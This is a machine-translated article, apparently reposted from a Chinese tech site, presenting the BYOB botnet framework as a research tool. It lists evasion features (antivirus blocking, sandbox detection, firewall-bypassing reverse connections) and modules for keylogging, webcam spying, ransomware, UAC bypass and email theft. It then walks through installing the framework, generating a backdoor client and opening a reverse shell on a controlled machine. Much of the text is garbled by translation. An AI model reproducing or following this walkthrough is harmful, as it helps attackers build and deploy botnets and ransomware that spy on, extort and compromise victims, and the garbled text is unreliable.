Shulou(Shulou.com)06/01 Report--

BYOB is an open source project that provides security researchers and developers with a framework to build and run basic botnets to deepen their understanding of the complex malware that infects millions of devices and generate modern botnets each year to improve their ability to develop responses to these threats.

It is designed to allow developers to easily implement their own code and add new features without having to write RAT (remote management tools) or C2 (command and control servers) from scratch.

The key feature of RAT is that arbitrary code / files can be remotely loaded into memory from C2 and executed on the target machine without writing anything to disk.

-- github link: https://github.com/malwaredllc/byob

-

Using the payload, remote imports generate clients that are completely undetectable

Remote import: import third-party software packages remotely from the server without writing them to disk or downloading / installing them without writing them to disk: clients never write anything to disk-not even temporary files (zero IO system calls) Because remote import allows arbitrary code to be dynamically loaded into memory and imported directly into the currently running process with zero dependency (not even Python itself): the client only runs the python standard library, imports any non-standard software packages / modules remotely from the server, and can be compiled into any platform / formatted portable binary executable architecture using an independent python interpreter Allow it to run on anything, even if Python itself is missing on the target host with one click to add new functionality:. / byob/modules/ any python scripts you want to copy to the directory when your command and control server is running Modules or packages will automatically become remotely imported and can be used directly by each client to write their own modules:. / byob/modules/ directory provides a basic module template that makes it a simple, barrier-free process to run unlimited modules without increasing file size: add unlimited functionality using remote imports Without adding a single byte to the file size of the client, it is fully updatable: each client will periodically check the server for new content available for remote import, and if anything is added / removed, its memory resources will be dynamically updated platform-independent: everything is written in Python (platform-independent language). The generated client can choose to compile into a portable executable file (Windows) or bundle into a stand-alone application (macOS) to bypass the firewall: the client connects to the command and control server through a reverse TCP connection, which bypasses most firewalls Because the default filter configuration mainly blocks incoming connections against antivirus countermeasures: prevent the encryption payload from being analyzed by antivirus software by blocking processes from generating known antivirus product names to prevent analysis: the primary client payload is encrypted with a random 256bit key, which exists only in the payload stager generated with it to prevent reverse engineering: by default If a virtual machine or sandbox is detected, the client will abort execution

Module

11 remotely imported post-development modules

Keylogger (byob.modules.keylogger): record user's keystrokes and input window name screenshot (byob.modules.screenshot): capture screenshot of current user's desktop webcam (byob.modules.webcam): view real-time stream or capture image / video from webcam Ransom (byob.modules.ransom): encrypt files and generate random BTC wallets to pay ransom Outlook (byob.modules.outlook): read / search / upload email from the local Outlook client Packet Sniffer (byob.modules.packetsniffer): run the packet sniffer on the host network and upload the .pcap file Persistence (byob.modules.persistence): set up a persistent phone on the host using five different methods (byob.modules.phone): read / search / on from the client smartphone SMS Escalate Privileges (byob.modules.escalate): try UAC bypass to gain unauthorized administrator privileges Port Scanner (byob.modules.portscanner): scan the local network for other online devices and open ports Process Control (byob.modules.process): list / search / kill / monitor processes currently running on the host

Core

Six core framework modules used by generators and servers

Utilities (byob.core.util): various utility functions Handlers (byob.core.handlers) used by many modules: request handlers to receive the results of completed tasks from the client (byob.core.security): Diffie-Hellman IKE and three encryption modes (AES-256-OCB,AES-256-CBC) XOR-128) Loaders (byob.core.loaders): import any package / module / script Payloads (byob.core.payloads) remotely from the server: reverse TCP shell, designed to import dependencies remotely Package and module Stagers (byob.core.stagers): generate a unique payload classifier to prevent analysis and detection of Generators (byob.core.generators): all functions that dynamically generate client generator code Database (byob.core.database): handle commands and control the interaction between the server and SQLite database

-

Installation:

Git clone https://github.com/malwaredllc/byob

Enter the boby directory after downloading

Pip install-r requirements.txt

Now it has been installed.

Client.py is the generation client and server.py is the server.

Python client.py-help

| | usage: client.py [- h] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt] [--compress] [--freeze] [- v] |

Host port [module [module...]] Generator (Build Your Own Botnet) positional arguments:host server ip address port port module module optional arguments:-h imported remotely at run time -- help View help-- File name generated by name NAME-- icon ICON icon (specify file location)-- pastebin API upload payload to pastebin (not hosted on C2 server)-- encrypt encryption payload embedded in the payload phase with random 128bit key-- compress compression generates a self-extracting python script-- freeze compiles the client to a separate executable file of the current host platform-v -- version to check the version number

-

(server.py 's help will not explain it.)

Our husband becomes a client (no module is used in this experiment)

Python client.py-name test (named test) 192.168.1.110 (server IP address) 4444 (port number)

Now we can see that the backdoor program of python has been generated, and we can open it and have a look.

Now we open a new terminal.

Python server.py-- host 192.168.1.110-- port 4444 (waiting for the controlled terminal to run * * automatic link)

At this time, we run the generated test.py on the controlled side.

Let's just go back to the server and see that it's already linked to

Then we enter help to view the help information

[root @ / usr/src/byob/byob] > help

Bg [id] background session (default is current session)

Broadcast broadcasts tasks to all active sessions

Clients displays all clients that have joined the server

Debug runs python code directly on the server (debug must enable debugging)

Exit exit

Help View help

Kill ends the session

Options displays the current configuration

Query query SQLite database

Ransom [id] encrypts client files and RANSOM encryption keys for bitcoin payments

Results [id] displays all completed results for clients (default for all clients)

Sessions displays the active client session

Set [option=value] change the current configuration

Shell reverse tcp shell session

Tasks [id] shows all outstanding client sessions (default for all clients)

Webcam captures images or videos from the client's camera

-

I see that my id is 1, my user name is root and I am an administrator

[root @ / usr/src/byob/byob] > shell 1

Check the ip address normally

The experiment was successful

-

This script continues to add new features, wait

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.